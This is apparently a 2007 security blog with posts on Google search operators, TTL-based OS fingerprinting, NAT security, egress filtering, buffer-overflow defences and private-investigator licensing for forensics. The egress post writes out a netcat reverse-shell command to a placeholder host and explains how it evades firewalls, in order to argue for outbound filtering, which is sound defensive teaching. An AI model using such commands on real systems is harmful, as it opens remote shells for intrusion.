Saturday, 10 November 2007

Google as a Search tool (its for more than hacking!)

I am a perpetual student. I am completing my LLM (Masters in Law) at the moment (I will have my dissertation complete by Feb 08). I use search engines in finding material all the time.

Johny Long, points out the value of checking Google for errors and vulnerabilies so that you do not become another Google Dork.

Both reasons are valid uses for these search engines. Some of the things you should know include:
  • Use "site:" to enumerate hostnames

  • Exclude common files with "-ext:"

  • Try "intitle:" if you are hunting a very specific setting or string

  • You can use "filetype:" if you are searching for intellectual property leakage

  • Finding relationships using "link:"Expanding relationships through "inanchor:"

  • Search patterns in URLs using "inurl:"

  • Limiting searches to specific countries with "restrict=countryCC"

  • Language-specific constraints using "hl" and "lr"

  • "all...:" operators

  • Ranges: "numrange:" and "daterange:"

  • Mixing Google operators

If you are interested in learnign more, I am teaching a SANS STAY SHARP class in Sydney next week. The class is Stay Sharp: Power Search with Google (formerly Google Hacking & Defense) and it is a must for anyone who has to work with web systems and security (firewall and IDS admins, network administrators, security and web etc). I look forward to seeing you there.

Guessing an Operating System using the TTL

Different operating systems use different TTL's (Time to Live fields). It is possible to change these defaults, but this is rarely the case on a production system.

32 bit Default TTL

Expected TTL range for the OS of 16-31

  • Microsoft Windows 95
  • Windows 95/98/98SE/ME/NT4 WRKS SP3,SP4,SP6a/NT4 Server SP4
  • Older Mac computers

64 bit Default TTL

Expected TTL range for the OS of 48-63

  • Compaq Tru64 5.0 is the exception to the Unix and Unix like systems
  • LINUX Kernel 2.2.x & 2.4.x
  • Mac OS X

128 bit Default TTL

Expected TTL range for the OS of 112-127

  • Newer Microsoft Windows operating system machines
  • Microsoft windows 2000, XP, Vista and 2003

255 bit Default TTL

Expected TTL range for the OS of 239-255

  • Cisco routers and switches
  • UNIX and UNIX-like operating systems
  • This includes FreeBSD 4.1, 4.0, 3.4; Sun Solaris 2.5.1, 2.6, 2.7, 2.8; OpenBSD 2.6, 2.7, NetBSD and HP UX 10.20, AIX

The average number of hops on the Internet is between 12 and 16. This value is far less than 32 the minimum difference between the TTL type blocks. The consequence is that it is possible to make a very good guess of the operating system from the TTL in a packet. All IP packets have TTL’s including of course ICMP, TCP and UDP.

So if we have a packet with a TTL of 118 for instance, we can make a good guess that it has come from a newer Windows system (eg. XP or 2003).

If we find a packet with a TTL in the range listed above, we can make a good guess that we have found the operating system type. More work is needed and it is always advisable to verify your findings, but it is a great start for a simple test.

If you are interested in learnign more, I am teaching a SANS STAY SHARP class in Sydney next week. The class is Stay Sharp: IP Packet Analysis and it is a must for anyone who has to work with packets (firewall and IDS admins, network administrators etc). I look forward to seeing you there.

Does NAT make my system more secure?

First we have to divide our discussion. There is Static NAT, Dynamic NAT or PAT and NAT-T. Let us for this post say SNAT, DNAT / PAT and NAT-T respectively.

NAT-T (Network Address Translation- Traversal or NAT Traversal in the IKE) is a further complication and makes security with NAT more difficult/problematic. NAT-T is defined in RFCs 3947 and 3948. NAT-T is designed to solve the problems inherent in using IPSec with NAT. It adds an extra layer of complexity and insecurity that will not be covered in this already long post.

First SNAT. Static NAT maps an IP to an IP. This is a one to one mapping. Though mapping of an address/port combination may be seen as the goal, filtering ports is a function of the ACL’s on the host, not the NAT. In this situation it is possible to determine the internal IP address assigned to the system and also to send packets to it (i.e. scan it).

SNAT directly maps a system. As a consequence there is little benefit from the NAT’ing process to security. If for instance we take a Checkpoint Firewall, there are 2 sets of tables in memory. First there is the IP mapping for NAT and then there is the ACL mapping for the filter. If the ACL was to fail open – a scan of the SNAT’d address would be the same as a scan of any valid address on the Internet through a router – that is no additional protection.

So with Static NAT we see that the value is not one of added security.
The associated ACL’s do this and NOT NAT.

DNAT, PAT – aka “porting” is a feature which allows many devices on a LAN (Local Area Network) to share one IP address by allocating a unique port address at layer four. With PAT there is a VERY minimal gain in security. It filters the lower end of the script kiddies. That is it.
It is possible to scan through PAT (just not dynamically). The system will have an assigned mapping of ports to addresses and host combinations. These addresses are allocated sequentially – not using any obscuration techniques. This allows the attacker to monitor traffic and make a map of the Internal systems over time.

Coupled with the fact that NAT does not strip content at the application layer, this means that the attacker will still be able to map internal addresses – it takes more time and is more difficult than having no PAT, but can be done. In particular, HTTP will still send the client IP in a packet. An internal Proxy will help, but this is another issue. The Proxy is a separate security function and not a part of NAT/PAT and should not be taken to confuse this issue.

Further, it is possible to collect ICMP and other responses to map systems through PAT without scanning. Responses from the router that supports PAT may be collected and collated to map the internal network over time. In many cases, when a router is used for PAT this is actually the better option form the attacker as router logs are commonly not protected well and are not centralised in many cases. Even better, a router that only logs to its internal buffer can be made to flush the evidence of the attack.

Now however, DNAT does have a security benefit. There is no current (though there are theories) existing means to ACTIVELY scan an internal network through a DNAT connection (there are passive means). Yes you can piggy back to a system that is being DNAT’d and scan, but you can not initiate a scan through the DNAT to the protected network. This is good for client machines and systems that make outgoing connections only. It will not be any use to a server or connections that connect inbound. It in other words does nothing at all to protect your Internet facing web server.

Dynamic NAT requires packets to be switched through the NAT router in order to generate NAT translations in the translation table. With Cisco routers, this is done using the “ip nat inside” command. It does mean that internally addressed packets must originate from the inside. In using the “ip nat outside” command, the packets have to come from the external interface. So DNAT offers a simple anti-spoofing benefit. One that is simple to configure without NAT it must also be stated and that takes less memory on the router without NAT.
Static NAT does not require packets to be switched through the router, and translations are statically entered into the translation table. That is the router adds the SNAT entries to its routing table.

On a Cisco (and many other) routers it is allowable in the Cisco code (and hence possible) to enable the use of the same global address for PAT and Static NAT. There are security issues with this and it is better to use different global addresses.

Next NAT will not protect the internal address of the router. So if we have a router with an internal address of, it is possible to send packets to this interface. SO WHAT you say? Well this means that it is possible (without ACL’s) to have the router respond with the internal address range. So the obfuscation of the internal address range is not obtained at all from NAT. This is something that people generally think is a key benefit of NAT.

Benefits and Summary.
In DNAT translations do not exist in the NAT table until the router receives traffic that requires translation. Dynamic translations have a timeout period after which they are purged from the translation table. This means that the attacker has to wait for an outgoing connect or attack the router.

Static NAT results in translations that reside in the NAT translation table from the moment you configure any static NAT command(s), and they remain in the translation table until you delete the static NAT command(s). So these are routed directly.

So to summarise… NAT will add some layer of security to client machines and those with outgoing connections. It will do little to protect servers that require incoming connections using SNAT. These entries are held in the routing table and it is the ACL and not NAT that protects the system.

DNAT still allows outgoing connections. ACL’s and not NAT filter this. NAT alone with no egress filters is still vulnerable to an attack. It is just more difficult.

Now to connect a shell through DNAT. (A shovelling shell).
For details, see my last post, “Escaping packets can help open the door into your network” of Thursday, November 8, 2007.
The result – the attacker has a command shell to your system through your firewall or NAT router. This even works on firewalls that block ALL incoming traffic with ACLs.

Packet filters are easily fooled and NAT offers no protection, again I have to state that a good proxy level firewall is not vulnerable and will secure your systems from this – but there are fewer and fewer of these being used.

Source routing Exploits
It may be of interest to know that many of the "low end" NAT based firewalls can be bypassed using Loose Source Routing. Even though the internal addresses are "hidden" with NAT, it is possible to route to them. More on this another time...

Thursday, 8 November 2007

Escaping packets can help open the door into your network!

(Or Why Egress filtering is important)

First I had better explain to everyone what Egress filters are. Most people understand the idea of Ingress filtering. This is stopping things coming into the network. Most people will agree that letting anything into the network from the Internet willy-nilly is a bad idea. But what are Egress filters and why are they necessary?

An Egress filter is a block on traffic leaving your network. This may not sound too nefarious, but it is not just the insiders who can damage your network from the inside. An external attacker can “push” a session from the client to a listener. That is they can make a shell connection from your server using outgoing traffic to get an incoming connection to your Internal systems.

Shovelling a shell

You may think that it is not possible to get an incoming shell from the Internet because you block incoming traffic. If you do, you are mistaken. There is an attack method known as shovelling a shell or just a shovelling shell.

Netcat is a common tool for doing this attack. The attacker would setup netcat as follows:
Listener: nc –l –p [port no.]
Client: nc [listenerIP] [port] –e /bin/sh

The firewall will see this as an outgoing connection from your system. It is in reality an incoming interactive shell. It is also a common way of using that buffer overflow condition - take your pick of the latest one hitting the streets.

Generally the client is activated at regular intervals through cron. The attacker will activate a netcat server and wait for the connection from the system being attacked. The system being attacked is generally configured using a common port that is generally allowed through your firewall and expected. Ports such as TCP 25 (SMTP), TCP 80 (HTTP) or TCP 443 (HTTPS) are used. If the attacker is really smart, they will tie the connection to UDP and bind it to something like UDP 53 (DNS) as it is rarely blocked. (nc -u: UDP Mode).

The result – the attacker has a command shell to your system through your firewall. This even works on firewalls that block ALL incoming traffic.

Packet filters are easily fooled, a good proxy level firewall is not – but there are fewer and fewer of these being used.

The worst thing, tools such as metasploit ( make this even easier. They bundle the exploit and tools into a single payload that even a novice script kiddie can use. So filter that outgoing Internet Traffic before it is too late!

Wednesday, 7 November 2007

What can stop a Buffer Overflow Exploit - Before it has a chance?

Well actually, we could attempt to fix the stack for a start. Fixing the multitude of programmes and programmers is unlikely and than again new ones are "born" every day. Better training is good, don't get me wrong, but it will not stop the problem.

We should all know that code "usually" resides in a R/O text area at the start of the program memory. In an ideal world our programs will not execute any instructions off of the data stack. [1]

Where the hardware supports it, software can be integrated to stop many of these exploits. On AMD64 and Pentium-4 (and newer) CPU's there is what is called an NX bit. The Linux kernel has had support for the NX bit functionality since 2.6.8. In solaris and HP-UX there are kernel switches for this behaviour on RISC chips (eg noexec_user_stack=1 in /etc/system on Solaris).

OpenBSD has W^X (3.4 up) and the grsecurity ( PaX patches include stack-protection from the Admantix Linux Project. Redhat has "Exec Shield" for this.

With the Risc systems (Solaris, HPUX etc), stack protection prevents executing code off stack pages. This still does not stop heap attacks - but these are another issue.

W^X and PaX (with NX) marks all writable-pages as non-executable - even the heap area and other data areas - not just the stack. The issues come as many high level languages (ie JAVA, JSP etc) execute runtime code out of the heap. Thus these can break Java.

So this is a functionality issue for a start. Many systems (eg Internet DNS) do not need the extended functionality provided by Java and other high level languages. In this case - there is a good case to disable code from running out of the data areas, stack and heap. On the other hand, Users want to browse the web etc and as such they want this added feature (ie no heap protection).

Alternatively there is another option.

There are complier-based solutions. Adding a "Canary" between the frame pointer and return address in order to create code that is resistant to buffer overflows. In this, any buffer overflow exploit that overflows the data area and writes downward to the return address pointer will also overwrite the canary value (I will ignore format string attacks for this as this make the post a little too complex).

In the normal course of program execution, the program will check the canary value. If this has been altered (ie buffer overflow exploit or error) the program aborts rather than returning the memory address given by the return address pointer. This adds an overhead of about 10% to the system, but makes many classical buffer overflows unable to be executed. GCC has this option built in (-fstack-protector & -fstack-protector-all) though they are rarely used. I believe that Novell - from OpenSUSE 10.3 is building this in though I have not tried to break this myself.

So to end - there are a number of options. Some work very well, but all have a cost. This may be an increase performance hit and it may be no Java, but it is possible. So for the original question, PAX helps, but it breaks Java and other pretty user toys.

[R/O = Read Only]
[1 = assuming the readership to be Geeks as well...]

Why PI Laws do not impact Digital Forensics

There has been much debate from the non-lawyers in the digital forensic community in the US as to where a PI license is need. I will state now that under existing US state code it is not.

In the case that you are assigned to work on a criminal case for the defence, you are also not investigating engaged by the attorney (or at least if you are smart you go through the correct process and are). The collection and analysis of expert evidence is not classified as an investigation in the manner being presupposed. I suggest that you read the US Supreme court cases of “Daubert v. Merrell Dow Pharmaceuticals, 509 U.S. 579 (1993)”, and Kumho Tire Co. v. Carmichael, 526 U.S. 137 (1999).

If you are worried still about the use of the language and feel that PI (Private Investigator) licensing is required to work in digital forensics due to the Texas administrative code, Tx has stronger working in many other sections of the occupations code. I know that I have examined computers that hold Tax and financial statement information – so who is either a registered Tax examiner or Public accountant? By the reading of the wording in the PI act that is being presumed by many, we all need also to be CPA’s at least to do this work.

So a questioon to ask in Texas is are you also a licensed firm under the “Texas board of licensing" as a professional engineer? The wide reading of the PI act will encompass this as well. In fact – this is only a narrow interpretation and many IT people call themselves an engineer. If this is the case you need to consider a license under Rule 133.13 under NCEES part 9 registration as an Electrical, electronic, computer, communications engineer. Of course this has the requirement to have “graduated from a degree program in which the undergraduate or graduate degree in the same discipline has been accredited or approved by any of the organizations identified in §133.31(a)(1)(A) or (a)(2)(A)”. So all those without degrees get out of IT? Same argument and one that holds more weight than the PI argument.

I happen to be a professional Engineer – so I am ok, how about you? Should we add to the FUD and spread this as well?

Should we spread the word that all Windows Helpdesk tech's need to get a degree and become members of a Professional Engineering Society to be in the IT industry? It is the same arguement being applied to the PI asertions.

So are we going to keep the FUD up and keep misinforming everyone as to what they need according to free legal advice from all the non-qualified lawyers on the list? I do not practice and am not licensed in Tx, but at least I am a qualified lawyer, how about you? It is about time that this BS is put to rest.

Kennard v Rosenberg, 127 CA 2d 340; 273 P2d 839, hrg den (1954).

“Where a statute is susceptible of two constructions, one leading to absurdity, and the other consistent with justice, good sense and sound policy, the former should be rejected and the latter adopted.”

"The uncontradicted evidence is that none of the plaintiffs herein were engaged in the private detective business or represented themselves to be so engaged. Plaintiffs were licensed engineers and as such were authorized to make investigations in connection with that profession. It seems quite clear that the private detective license law was not intended by the Legislature to place a limitation on the right of professional engineers to make chemical tests, conduct experiments and to testify in court as to the results thereof. A physician, geologist, accountant, engineer, surveyor or a handwriting expert, undoubtedly, may lawfully testify in court in connection with his findings without first procuring a license as a private detective, and, as in the instant case, a photographer may be employed to take photographs of damaged premises for use in court without procuring such a license. Likewise, plaintiff, who was hired as a consultant and expert and not as a private detective and investigator was not required to have a license as such before being permitted to testify in court as an expert."

"… it was the intent of the Legislature to require those who engage in business as private investigators and detectives to first procure a license so to do; that the statute was enacted to regulate and control this business in the public interest; that it was not intended to apply to persons who, as experts, were employed as here, to make tests, conduct experiments and act as consultants in a case requiring the use of technical knowledge."

An investigator (digital forensic) is not required to have a license as a PI. Plain and Simple. This does not make a shread of differnce be it in the US state of Texas, Georgia or even CA.

At the worst the argument is that you need to be one of a(n):
· Computer Systems Engineer
· Accountant
· Lawyer
· Academic
· Scientist
· …
· And eventually we get PI somewhere as an option - not the be all and end all it is made to be.

So at the least lets get the argument straight.

[FUD = Fear, Uncertainty and Doubt for those not in the know]